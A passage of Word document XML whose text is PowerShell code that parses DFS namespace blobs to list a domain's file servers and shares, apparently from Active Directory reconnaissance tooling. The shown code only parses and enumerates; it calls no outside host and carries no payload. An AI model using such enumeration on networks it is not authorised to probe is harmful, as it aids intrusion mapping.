        <w:t xml:space="preserve">                    $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C84E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65BAF9AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $type_start = $short_prefix_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51095B88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $type_end = $type_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09551B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5412F1CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75D3558F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state_start = $type_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786341A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state_end = $state_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289ABAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BEAB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70B7F9F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_size_start = $state_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCA1BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_size_end = $comment_size_start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5ADFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80DD6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_start = $comment_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAF3CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_end = $comment_start + $comment_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B285745" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($comment_size -gt 0)  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A8AA56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B8EE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C59F03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_timestamp_start = $comment_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C721C5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_timestamp_end = $prefix_timestamp_start + 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B719AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B606E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F7CEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state_timestamp_start = $prefix_timestamp_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE7C4C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state_timestamp_end = $state_timestamp_start + 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C741AF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B0E62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_timestamp_start = $state_timestamp_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA39639" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_timestamp_end = $comment_timestamp_start + 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6F3A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D491E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $version_start = $comment_timestamp_end  + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6AF7BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $version_end = $version_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEE09C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB7712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0443C270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # Parse rest of DFSNamespaceRootOrLinkBlob here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686EE72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob_size_start = $version_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176683F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A3B1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A95AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="111D45BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B089A4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041482D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC7083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob_size_start = $dfs_targetlist_blob_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5157B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob_size_end = $reserved_blob_size_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0635B287" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EAA47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EA73957" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob_start = $reserved_blob_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F8663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E35E40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA3B8BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $referral_ttl_start = $reserved_blob_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F2C4F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $referral_ttl_end = $referral_ttl_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AE1D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236D217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C26A627" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    #Parse DFSTargetListBlob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C11DC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $target_count_start = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F4B0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $target_count_end = $target_count_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F3F09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF22C22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $t_offset = $target_count_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E941BD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22FC30B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    for($j=1; $j -le $target_count; $j++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5A5C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $target_entry_size_start = $t_offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814F60A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_entry_size_end = $target_entry_size_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FD36D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE9E64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_time_stamp_start = $target_entry_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F3919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_time_stamp_end = $target_time_stamp_start + 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E3498" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # FILETIME again or special if priority rank and priority class 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14941E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79832820" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_state_start = $target_time_stamp_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A73CAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_state_end = $target_state_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF85CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254CD1DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F1B83DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_type_start = $target_state_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EB62A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_type_end = $target_type_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF2CEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B0E0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47C640DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name_size_start = $target_type_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB35712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name_size_end = $server_name_size_start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A201FE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7412D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7903B7F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name_start = $server_name_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB57438" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name_end = $server_name_start + $server_name_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32385AFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707832A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="363FA146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $share_name_size_start = $server_name_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421ACB0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $share_name_size_end = $share_name_size_start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC9CA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842477F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $share_name_start = $share_name_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BDC002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $share_name_end = $share_name_start + $share_name_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577BE3A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8FF64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DCA7FFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $target_list += "\\$server_name\$share_name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CCC87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $t_offset = $share_name_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F12B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CB3E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E1661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D7E4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $offset = $blob_data_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC31B92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $dfs_pkt_properties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05BACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Name' = $blob_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC59F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Prefix' = $prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C740624" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'TargetList' = $target_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C4966" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38C259" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E848036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $prefix = $null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C377413" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $blob_name = $null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D02A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $target_list = $null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B7CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6B1EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FA4BDE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $servers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15CA24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $object_list | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F899A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($_.TargetList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B5597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $_.TargetList | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F44FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $servers += $_.split("\")[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72869485" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCA0C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B028CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46199FF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="601A33EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6846CE3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62A40B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="063C2872" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Get-DFSshareV1 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE84700" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
